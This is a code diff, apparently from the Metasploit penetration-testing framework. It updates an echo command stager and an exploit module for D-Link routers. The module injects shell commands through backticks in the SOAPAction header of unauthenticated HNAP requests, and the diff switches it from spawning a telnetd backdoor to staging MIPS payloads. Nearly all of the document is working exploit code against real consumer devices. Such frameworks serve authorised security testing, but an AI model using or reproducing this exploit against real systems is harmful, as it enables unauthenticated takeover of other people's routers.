echo stager

Author: Michael Messner

lib/rex/exploitation/cmdstager/echo.rb

@@ -26,10 +26,14 @@ def initialize(exe)
   # and initialize opts[:enc_format].
   #
   def generate(opts = {})
-    opts[:temp] = opts[:temp] || '/tmp/'
-    opts[:temp].gsub!(/\\/, "/")
-    opts[:temp] = opts[:temp].shellescape
-    opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    if opts[:temp] == false
+      opts[:temp] = ''
+    else
+      opts[:temp] = opts[:temp] || '/tmp/'
+      opts[:temp].gsub!(/\\/, "/")
+      opts[:temp] = opts[:temp].shellescape
+      opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    end
 
     # by default use the 'hex' encoding
     opts[:enc_format] = opts[:enc_format] || 'hex'

modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb

@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -25,7 +25,7 @@ def initialize(info = {})
       'Author'      =>
         [
           'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
-          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Craig Heffner',  # independent Vulnerability discovery on different other routers
           'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
@@ -37,13 +37,25 @@ def initialize(info = {})
       'DisclosureDate' => 'Feb 13 2015',
       'Privileged'     => true,
       'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Targets'        =>
+      'Targets' =>
         [
-          [ 'Automatic',        { } ]
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPS
+            }
+          ],
         ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'    => 0
       ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -77,47 +89,20 @@ def exploit
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
-
-    cmd = "telnetd -p #{telnetport}"
-
-    execute_command(cmd)
-
-    handle_telnet(telnetport)
-  end
-
-  def handle_telnet(telnetport)
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :temp    => false
+    )
 
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
-
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
-    end
-    return
   end
 
-  def execute_command(cmd)
+  def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd}`"
+    cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
     begin
       res = send_request_cgi({